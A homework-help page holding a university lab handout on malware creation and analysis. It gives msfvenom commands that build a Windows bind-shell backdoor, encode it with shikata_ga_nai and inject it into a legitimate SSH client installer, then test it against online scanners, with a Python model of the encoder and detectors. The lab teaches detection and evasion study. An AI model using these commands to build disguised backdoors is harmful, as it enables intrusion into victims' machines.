Levels Taught: Elementary, Middle School, High School, College, University, PhD
Teaching Since: Apr 2017
Last Sign in: 103 Weeks, 3 Days Ago
Questions Answered: 4870
Tutorials Posted: 4863
MBA IT, Master in Science and Technology
Devry
Jul-1996 - Jul-2000
Professor
Devry University
Mar-2010 - Oct-2016
Hi, I need help with this homework. The task is to create a listener and encode a payload in Kali.
All details are in the homework sheet.
Thank you
Lab Session #6: Malware Analysis
The lab involves one assignment (see section 5) due on week 8; after performing the
task, you need to present your results in a brief report (with screenshots) and submit by
the deadline.
1. Introduction
The purpose of this lab is to learn from a practical perspective about malware creation
and analysis. We will illustrate malware creation by focusing on a particular type of
malware referred to as backdoor.
We will create a piece of malware code and analyze the code using a free online virus
detection service. Online virus detection services combine the capability of several
existing antivirus engines.
To create the malware, we will use a tool from the Metasploit Framework, named
msfvenom (available in Kali), which allows creating and encoding payloads.
2. Backdoors
A dangerous type of malware often used by hackers is the so-called backdoor program.
Once a system has been compromised, it is important for the attacker to maintain
access to the system. It is not uncommon for system maintenance windows to occur
during the attack time frame. If the goal of the scheduled maintenance is to patch the
vulnerability exploited to gain access, the access will be terminated. Also if the system is
rebooted or the attacker loses connectivity, remote shell access may be permanently
lost.
Backdoors are ways around traditional defense obstacles (e.g. firewall, access control)
that give the attacker unrestricted access to the compromised system.
Quite often, backdoors are structured around a small piece of shellcode (or script) that
provides connectivity between the attacker and victim machines, referred to as a listener
(program).
A listener can work as either a server or a client, which gives two modes of use:
1. Shell mode (also called bind shell): the program is configured to listen for a
connection on the compromised system and spawn (automatically) a shell when a connection
is made, providing a command line to access the (exploited) system. Here the victim side
is the server and the attacker connects in.
2. Reverse shell: the program is configured to initiate a connection from the exploited
system to an attack server under the control of the attacker, who is waiting for it. Here
the victim side is the client; because most firewalls allow outbound connections more
readily than inbound ones, this mode is usually the more reliable of the two.
In this lab session, we will illustrate backdoor creation using the Metasploit Framework.
Specifically, we will use the msfvenom tool from the Metasploit Framework. Msfvenom
will be used initially to create a listener program and then to obfuscate (by encoding) the
generated payload. Antivirus protects machines from malware, but not from all of it. There
are ways to pack or encode malware to make it harder to detect. Encoding with a well-known
tool like msfvenom does not, however, make a payload invisible to antivirus: the decoder
stub the encoder prepends is itself a widely signatured byte pattern, and several engines
simply emulate that stub and scan the decoded result. The assignment in section 5 measures
how much (if anything) the encoding actually buys.
Note:
There is a bug in metasploit console on the Kali version posted by Offensive Security.
This version is easier to install, but it has some minor issues.
When performing lab 6, I recommend using a regular command line console for the
practice and assignment questions. The bug may occur (if not already fixed), for
instance, when you type the following commands using msfconsole:
>msfvenom -h
or
>msfvenom -l
and so on.
The alternative is to simply use a regular command window as depicted later in this
document.
Note that this issue occurs only on the Kali version posted by Offensive Security. If you
are running the original version from the Kali site (more painful to install),
then this doesn't concern you.
3. Malware Creation using msfvenom
Payload Generation
Msfvenom is the command-line payload generator of Metasploit: it can emit any of the
shellcodes (payloads) available in the Framework, in a chosen output format (raw bytes,
exe, elf, a C array, and so on). The generated shellcode can be used to craft an exploit
that is not currently available in the Metasploit Framework.
To view the different options and variables available to this tool, open a command line in
Kali, and type the following command:
msfvenom -h
To view the vast number of different types of shellcode that are available to be
customized for your specific exploit, type the following command:
msfvenom -l
(On current versions, msfvenom -l payloads restricts the listing to payloads and
msfvenom -l encoders to encoders.)
We will illustrate malware creation and analysis using a shellcode called
windows/shell_bind_tcp.
After typing the above command (msfvenom -l), scroll down the list (under Framework
Payloads) to locate the windows/shell_bind_tcp shellcode, as follows:
windows/shell_bind_tcp Listen for a connection and spawn a command shell
The description of the shellcode indicates that its purpose is to listen for a connection
and spawn a command shell, which as explained earlier can be categorized as a
listener working in shell (bind) mode.
To find out how to customize a payload in Metasploit, ask msfvenom to list the options of
that payload, as follows:
msfvenom -p windows/shell_bind_tcp --list-options
(The form "msfvenom windows/shell_bind_tcp O" seen in older handouts is the syntax of the
retired msfpayload tool and is not accepted by msfvenom; older msfvenom releases spell this
option --payload-options.)
This will list all of the available configurable options for that payload, most
importantly LPORT, the TCP port the listener will open on the victim.
Encoding
Msfvenom can also be used to encode a payload (or exploit code). An encoder transforms the
payload bytes into a different byte sequence and prepends a small decoder stub that
rebuilds and runs the original at run time, so the result performs the same function as
the original code. Encoders were built first of all to keep "bad characters" (for instance
NUL bytes, which would terminate a string copy) out of a payload; a side effect is that a
byte signature written for the original payload no longer matches the encoded bytes, which
is why encoding can sometimes escape (virus) detection. The decoder stub itself is not
encoded, and it is what many engines signature instead.
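The following is an added example, not Metasploit's code and not part of the lab handout: a Python model of the XOR additive-feedback scheme behind x86/shikata_ga_nai, with two kinds of detector run over its output. It also bears on assignment questions 1 and 6 in section 5. Assumptions: a 32-bit key; the feedback direction key += original dword (as in Metasploit's XorAdditiveFeedback base encoder); a 4-byte GetPC instruction standing in for the real decoder stub, with the key stored as raw bytes after it; and a constructed sample payload rather than real shellcode.

```python
"""Model of a polymorphic XOR additive-feedback encoder plus static and
emulating detection.  Added example, not Metasploit's code; see assumptions
in the comments."""
import os
import struct

MASK = 0xFFFFFFFF

# Constructed sample "shellcode" (not real shellcode): a NOP sled plus a string
# that a byte-pattern antivirus signature could match on.
SAMPLE_PAYLOAD = b"\x90\x90\x90\x90" + b"cmd.exe\x00"

# fnstenv [esp-0xc]: the x86 GetPC instruction a shikata_ga_nai stub starts
# with.  Assumption of this model: these 4 bytes stand in for the whole decoder
# loop and are followed by the key as 4 raw bytes.  A real stub is ~27 bytes,
# carries the key in a mov-immediate and randomises registers and instruction
# order on every build.
GETPC_STUB = b"\xd9\x74\x24\xf4"

SIGNATURES = {
    "payload.cmd_string": b"cmd.exe",   # only visible while the payload is in the clear
    "stub.shikata_getpc": GETPC_STUB,   # the stub must stay in the clear to run
}


def pad4(data: bytes) -> bytes:
    """Pad to a dword boundary with NOPs so the 4-byte loop covers everything."""
    return data + b"\x90" * (-len(data) % 4)


def encode(payload: bytes, key: int) -> bytes:
    """XOR each dword with the running key, then add the ORIGINAL dword to the
    key (additive feedback): every block's key depends on all earlier blocks."""
    out = bytearray()
    for off in range(0, len(payload), 4):
        orig = struct.unpack_from("<I", payload, off)[0]
        out += struct.pack("<I", orig ^ key)
        key = (key + orig) & MASK
    return bytes(out)


def decode(blob: bytes, key: int) -> bytes:
    """What the stub does at run time: xor [esi], key ; add key, [esi]."""
    out = bytearray()
    for off in range(0, len(blob), 4):
        orig = struct.unpack_from("<I", blob, off)[0] ^ key
        out += struct.pack("<I", orig)
        key = (key + orig) & MASK
    return bytes(out)


def build_sample(payload: bytes, keys) -> bytes:
    """One encoding layer per key, like msfvenom -i N: each layer gets its own
    stub, so the outermost stub is always in the clear."""
    sample = pad4(payload)
    for key in keys:
        sample = GETPC_STUB + struct.pack("<I", key) + encode(sample, key)
    return sample


def pick_key(data: bytes, bad_chars: bytes = b"\x00", tries: int = 10000) -> int:
    """Encoders exist first of all to keep bad characters out of the output, as
    msfvenom -b does: draw random keys until the whole layer is clean."""
    for _ in range(tries):
        key = struct.unpack("<I", os.urandom(4))[0]
        if not any(b in build_sample(data, [key]) for b in bad_chars):
            return key
    raise ValueError("no key avoids the bad characters")


def build_clean_sample(payload: bytes, iterations: int = 1,
                       bad_chars: bytes = b"\x00") -> bytes:
    """Polymorphic build: fresh random keys on every call, each chosen against
    the layer it encodes, so the final output contains no bad characters."""
    sample = pad4(payload)
    for _ in range(iterations):
        sample = build_sample(sample, [pick_key(sample, bad_chars)])
    return sample


def static_scan(sample: bytes, signatures: dict) -> list:
    """Byte-pattern matching on the file exactly as it sits on disk."""
    return sorted(name for name, pat in signatures.items() if pat in sample)


def peel(sample: bytes) -> bytes:
    """Undo every stub layer: what an emulating engine achieves by actually
    running the stub on a sandboxed CPU until the original bytes appear."""
    while sample.startswith(GETPC_STUB) and len(sample) >= 8:
        key = struct.unpack_from("<I", sample, 4)[0]
        sample = decode(sample[8:], key)
    return sample


def emulate_and_scan(sample: bytes, signatures: dict) -> list:
    """Signatures found either on disk or after emulated decoding."""
    return sorted(set(static_scan(sample, signatures))
                  | set(static_scan(peel(sample), signatures)))


if __name__ == "__main__":
    sample = build_clean_sample(SAMPLE_PAYLOAD, iterations=2)
    print("on-disk bytes :", sample.hex())
    print("static scan   :", static_scan(sample, SIGNATURES))
    print("emulated scan :", emulate_and_scan(sample, SIGNATURES))
```

Running it twice gives two different files (the polymorphism), in neither of which the string signature matches statically, while the GetPC bytes match every time and the emulating scan recovers the string through any number of layers. That asymmetry is the whole story behind scanners that flag msfvenom output regardless of encoding.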
Check the various encoders that are available by running msfvenom with the option '-l'
(or, to see only the encoders, '-l encoders'):
msfvenom -l
For instance, by scrolling down the list (under Framework Encoders), you'll see the
shikata_ga_nai encoder as shown below:
x86/shikata_ga_nai excellent Polymorphic XOR Additive Feedback Encoder
That is one of the encoders that we'll use later to encode our sample malware code.
"Polymorphic" means that each run draws a fresh random key and varies the registers and
instruction order of the decoder stub, so the same payload produces a different file every
time; "XOR additive feedback" means that each 4-byte block is XORed with a running key
which is then updated by adding the block just decoded.
4. Sample Malware Creation and Analysis
We will create a sample malware and try to detect it using a free online virus detection
service.
While there are several free online virus detection services, I will illustrate the example
using the Gary's Hood Online Virus Scanner (http://www.garyshood.com/virus/), a service
which combines several existing scanners.
Creating a Listener
This is a simple payload that gives the attacker remote control of a machine. It is not a
virus, and won't spread, but it is detected by antivirus engines.
In Kali, in a Terminal window, execute these commands:
cd
msfvenom -p windows/shell/bind_tcp LPORT=2482 -a x86 --platform win -f exe > /root/listen.exe
ls -l
Note that windows/shell/bind_tcp is the staged variant of the payload listed earlier: the
executable contains only a small first stage that listens on port 2482 and expects the
connecting side to send the shell stage, so it has to be driven by Metasploit's handler
(exploit/multi/handler with the same payload) rather than by plain netcat; the stageless
windows/shell_bind_tcp carries the whole shell and can be reached with netcat. For this lab
either variant is fine, since the file is only scanned, never run.
You should see the listen.exe file, as shown below:
Note: Use different file names for your malware samples (instead of listen) since I
already ran these files through the scanner.
Analyzing the Listener with the Online Scanner
In Kali, click Applications, Internet, and open a browser, for instance "Firefox Web
Browser" (if you installed it; or the default browser, which is the Iceweasel browser).
In the browser, go to http://www.garyshood.com/virus/
Click the "Browse" button, and select listen.exe.
"listen.exe" appears in the "Choose File" box, as shown below:
In the Online Scanner web page, click the "Scan" button.
The analysis shows that two of the antivirus engines detected the file--2 out of 4, when I
did it, as shown below. You may see different numbers, but some of the engines should
detect it.
5. Task (Assignment)
In this assignment, you are asked to recreate a listener with the same payload as in the
practice (see above) but also encode it. We will use the shikata_ga_nai encoder
available in Metasploit and an imported template file.
1. Explain briefly what is the purpose of a virus encoder, and what is the encoding
scheme used by shikata_ga_nai.
2. Download the following file:
http://www2.ohlone.edu/downloads/SSHSecureShellClient-3.2.9.exe
3. Create 3 new listener files using the following command sequence (make sure
that you use your own file name (i.e. not listen or listen1); and you can use any
directory location; the commands below assume that /root/Desktop/msfDir/ exists and that
the file downloaded in step 2 was saved there). Note that the platform option takes two
dashes (--platform); with a single dash msfvenom rejects the command.
Option 1: Basic Listener
msfvenom -p windows/shell/bind_tcp LPORT=2482 -a x86 --platform win -f exe > /root/Desktop/msfDir/listenFile1.exe
Option 2: Basic Encoding
msfvenom -p windows/shell/bind_tcp LPORT=2482 -a x86 --platform win -f exe -e x86/shikata_ga_nai > /root/Desktop/msfDir/listenFile2.exe
(-e applies a single pass of the encoder; -i N would apply N passes, each wrapping the
output in its own decoder stub.)
Option 3: Using Basic Encoding & Imported Template
msfvenom -p windows/shell/bind_tcp LPORT=2482 -a x86 --platform win -f exe -e x86/shikata_ga_nai -x /root/Desktop/msfDir/SSHSecureShellClient-3.2.9.exe > /root/Desktop/msfDir/listenFile3.exe
The -x option is what imports the template: msfvenom injects the encoded payload into a
copy of the SSH client executable from step 2 instead of its own built-in stub executable
(add -k to keep the template's original code running in a separate thread, where the
template allows it). Without -x, option 3 would be identical to option 2.
using both Gary’s Hood (http://www.garyshood.com/virus) and Virus Total
(https://www.virustotal.com) scanners.
5. Comment the scanning results obtained before and after the encoding; discuss
the impact of the encoding and indicate whether or not the goal of hiding the
malware has been achieved.
6. Explain (3-4 paragraphs) why some virus detectors are able to detect encoded
exploit code while others are not.
Note: it is absolutely required to provide screenshots of the command windows (with
the commands) and the scan results.
Summary
This lab session introduces malware creation and analysis by focusing on the case of
backdoor programs. The malware creation process is illustrated using the Metasploit
Framework.
The next lab session will provide hands on experience on web security by introducing
various web application attack scenarios.